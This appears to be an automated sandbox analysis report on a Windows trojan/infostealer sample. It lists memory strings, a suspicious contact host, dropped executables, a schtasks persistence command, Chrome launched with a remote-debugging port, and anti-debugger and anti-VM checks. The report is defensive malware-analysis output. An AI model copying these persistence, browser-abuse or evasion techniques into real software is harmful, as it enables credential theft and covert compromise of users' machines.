Source: chrome.exe, 00000004.00000003.1745882211.00000A7402570000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1745929474.00000A740300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1772660190.00000A7402E90000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/6953
Source: chrome.exe, 00000004.00000002.1763681508.00000A7402688000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1745882211.00000A7402570000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1745929474.00000A740300C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7036
Source: chrome.exe, 00000004.00000003.1745882211.00000A7402570000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1745929474.00000A740300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1772660190.00000A7402E90000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7047
Source: chrome.exe, 00000004.00000003.1745882211.00000A7402570000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1745929474.00000A740300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1772660190.00000A7402E90000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7172
Source: chrome.exe, 00000004.00000002.1772660190.00000A7402E90000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7172S
Source: chrome.exe, 00000004.00000003.1745882211.00000A7402570000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1745929474.00000A740300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1772660190.00000A7402E90000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7279
Source: chrome.exe, 00000004.00000002.1772660190.00000A7402E90000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7279E
Source: chrome.exe, 00000004.00000003.1745882211.00000A7402570000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1745929474.00000A740300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1772660190.00000A7402E90000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7370
Source: chrome.exe, 00000004.00000003.1745882211.00000A7402570000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1745929474.00000A740300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1772660190.00000A7402E90000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7406
Source: chrome.exe, 00000004.00000003.1745882211.00000A7402570000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1745929474.00000A740300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1772660190.00000A7402E90000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7488
Source: chrome.exe, 00000004.00000002.1772660190.00000A7402E90000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7488o
Source: chrome.exe, 00000004.00000003.1745882211.00000A7402570000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1745929474.00000A740300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1772660190.00000A7402E90000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7553
Source: chrome.exe, 00000004.00000003.1745882211.00000A7402570000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1745929474.00000A740300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1772660190.00000A7402E90000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7556
Source: chrome.exe, 00000004.00000003.1745882211.00000A7402570000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1745929474.00000A740300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1772660190.00000A7402E90000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7724
Source: chrome.exe, 00000004.00000002.1772660190.00000A7402E90000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7724B
Source: chrome.exe, 00000004.00000003.1745882211.00000A7402570000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1745929474.00000A740300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1772660190.00000A7402E90000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7760
Source: chrome.exe, 00000004.00000003.1745882211.00000A7402570000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1745929474.00000A740300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1772660190.00000A7402E90000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7761
Source: chrome.exe, 00000004.00000003.1745882211.00000A7402570000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1745929474.00000A740300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1772660190.00000A7402E90000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/8162
Source: chrome.exe, 00000004.00000002.1765994017.00000A74028A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1745882211.00000A7402570000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1745929474.00000A740300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1772660190.00000A7402E90000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/8215
Source: chrome.exe, 00000004.00000002.1772660190.00000A7402E90000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/8215O
Source: chrome.exe, 00000004.00000002.1765994017.00000A74028A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1745882211.00000A7402570000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1745929474.00000A740300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1772660190.00000A7402E90000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/8229
Source: chrome.exe, 00000004.00000003.1745882211.00000A7402570000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1745929474.00000A740300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1772660190.00000A7402E90000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/8280
Source: chrome.exe, 00000004.00000002.1772660190.00000A7402E90000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/8280F
Source: chrome.exe, 00000004.00000002.1772660190.00000A7402E90000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/8280K
Source: chrome.exe, 00000004.00000002.1762475459.00000A740240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://clients2.google.com/time/1/current
Source: chrome.exe, 00000004.00000002.1765473641.00000A740282C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
Source: chrome.exe, 00000004.00000002.1761996040.00000A74022E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://developer.chrome.com/extensions/external_extensions.html)
Source: chrome.exe, 00000004.00000002.1761704438.00000A740225A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://google.com/
Source: kFrGefsAK3.exe, 00000001.00000003.1332883664.000000000782F000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://home.fivetk5sb.top/niCGMfnfOxUBXxpLhBBB17
Source: kFrGefsAK3.exe, 00000001.00000003.1332883664.000000000782F000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://html4/loose.dtd
Source: chrome.exe, 00000004.00000003.1745929474.00000A740300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1774509115.00000A7402FC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://issuetracker.google.com/200067929
Source: chrome.exe, 00000004.00000003.1749175481.00000A74032AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1749024793.00000A740329C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1749861106.00000A74032C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1749705361.00000A7403190000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://jsbin.com/temexa/4.
Source: chrome.exe, 00000004.00000002.1764104940.00000A7402735000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/:
Source: chrome.exe, 00000004.00000002.1764104940.00000A7402735000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/?lfhs=2
Source: chrome.exe, 00000004.00000002.1764104940.00000A7402735000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/J
Source: chrome.exe, 00000004.00000002.1764104940.00000A7402735000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1763119362.00000A7402584000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
Source: chrome.exe, 00000004.00000002.1771138523.00000A7402B80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1772496579.00000A7402E3C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/?q=
Source: chrome.exe, 00000004.00000002.1771138523.00000A7402B80000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/?q=searchTerms
Source: chrome.exe, 00000004.00000002.1772574203.00000A7402E5C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: chrome.exe, 00000004.00000002.1772496579.00000A7402E3C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: chrome.exe, 00000004.00000002.1772496579.00000A7402E3C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtabn
Source: chrome.exe, 00000004.00000002.1772496579.00000A7402E3C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.ico
Source: CaHNbeclRGcBxNSvHjFX.dll.1.dr String found in binary or memory: https://gcc.gnu.org/bugs/):
Source: kFrGefsAK3.exe, 00000001.00000003.1364414079.0000000001CC1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://httpbin.org/ip
Source: kFrGefsAK3.exe, 00000001.00000003.1332883664.000000000782F000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://httpbin.org/ipbefore
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49804

System Summary

Source: C:\Users\user\Desktop\kFrGefsAK3.exe File dump: service123.exe.1.dr 314617856
Source: kFrGefsAK3.exe Static PE information: section name:
Source: kFrGefsAK3.exe Static PE information: section name: .idata
Source: kFrGefsAK3.exe Static PE information: section name:
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Process Stats: CPU usage > 49%
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 16_2_00A951B0 16_2_00A951B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 16_2_00A93E20 16_2_00A93E20
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7660 -s 1152
Source: kFrGefsAK3.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: kFrGefsAK3.exe Static PE information: Section: aqvtbplo ZLIB complexity 0.9946345058056193
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@23/7@17/5
Source: C:\Users\user\Desktop\kFrGefsAK3.exe File created: C:\Users\user\AppData\Local\fHjWqgTqEM
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7660
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Mutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6564:120:WilError_03
Source: C:\Users\user\Desktop\kFrGefsAK3.exe File created: C:\Users\user~1\AppData\Local\Temp\service123.exe Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: chrome.exe, 00000004.00000002.1764104940.00000A7402735000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
Source: kFrGefsAK3.exe Virustotal: Detection: 58%
Source: kFrGefsAK3.exe ReversingLabs: Detection: 60%
Source: unknown Process created: C:\Users\user\Desktop\kFrGefsAK3.exe "C:\Users\user\Desktop\kFrGefsAK3.exe"
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2404 --field-trial-handle=2284,i,17304781938837466691,17340018191184435159,262144 /prefetch:8
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user~1\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7660 -s 1152
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user~1\AppData\Local\Temp\/service123.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default" Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2404 --field-trial-handle=2284,i,17304781938837466691,17340018191184435159,262144 /prefetch:8 Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cahnbeclrgcbxnsvhjfx.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: kFrGefsAK3.exe Static file information: File size 4464128 > 1048576
Source: kFrGefsAK3.exe Static PE information: Raw size of is bigger than: 0x100000 < 0x28a000
Source: kFrGefsAK3.exe Static PE information: Raw size of aqvtbplo is bigger than: 0x100000 < 0x1b4000
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 16_2_00A981E0 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError,FreeLibrary, 16_2_00A981E0
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: kFrGefsAK3.exe Static PE information: real checksum: 0x44d1c9 should be: 0x45190e
Source: kFrGefsAK3.exe Static PE information: section name:
Source: kFrGefsAK3.exe Static PE information: section name: .idata
Source: kFrGefsAK3.exe Static PE information: section name:
Source: kFrGefsAK3.exe Static PE information: section name: aqvtbplo
Source: kFrGefsAK3.exe Static PE information: section name: fixzxdaf
Source: kFrGefsAK3.exe Static PE information: section name: .taggant
Source: service123.exe.1.dr Static PE information: section name: .eh_fram
Source: CaHNbeclRGcBxNSvHjFX.dll.1.dr Static PE information: section name: .eh_fram
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 16_2_00A9A499 push es; iretd 16_2_00A9A694
Source: kFrGefsAK3.exe Static PE information: section name: aqvtbplo entropy: 7.955432588000684
Source: C:\Users\user\Desktop\kFrGefsAK3.exe File created: C:\Users\user\AppData\Local\Temp\CaHNbeclRGcBxNSvHjFX.dll Jump to dropped file
Source: C:\Users\user\Desktop\kFrGefsAK3.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe Jump to dropped file

Boot Survival

Source: C:\Users\user\Desktop\kFrGefsAK3.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user~1\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\kFrGefsAK3.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: kFrGefsAK3.exe, 00000001.00000003.1332883664.000000000782F000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: PROCMON.EXE
Source: kFrGefsAK3.exe, 00000001.00000003.1332883664.000000000782F000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: X64DBG.EXE
Source: kFrGefsAK3.exe, 00000001.00000003.1332883664.000000000782F000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: WINDBG.EXE
Source: kFrGefsAK3.exe, 00000001.00000003.1332883664.000000000782F000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: kFrGefsAK3.exe, 00000001.00000003.1332883664.000000000782F000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: WIRESHARK.EXE
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1372B38 second address: 1372B3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 139AF15 second address: 139AF19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 139B2D4 second address: 139B2D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 139B2D8 second address: 139B2E2 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA278C27B76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 139B2E2 second address: 139B2EB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 139B2EB second address: 139B2F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 136A352 second address: 136A358 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 136A358 second address: 136A36B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jg 00007FA278C27B76h 0x0000000d jp 00007FA278C27B76h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 139BAB3 second address: 139BADF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jmp 00007FA278C0D024h 0x0000000b jmp 00007FA278C0D01Fh 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 139BC04 second address: 139BC08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 139BC08 second address: 139BC17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FA278C0D016h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 139BD6E second address: 139BD78 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA278C27B76h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 139C135 second address: 139C146 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jp 00007FA278C0D01Ch 0x0000000b rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 139C146 second address: 139C14B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 139D89C second address: 139D8B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C0D027h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13A174A second address: 13A178C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA278C27B81h 0x00000009 popad 0x0000000a jng 00007FA278C27B85h 0x00000010 jmp 00007FA278C27B7Fh 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FA278C27B80h 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13A178C second address: 13A17A0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FA278C0D01Eh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13A17A0 second address: 13A17B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA278C27B81h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13A5540 second address: 13A5545 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
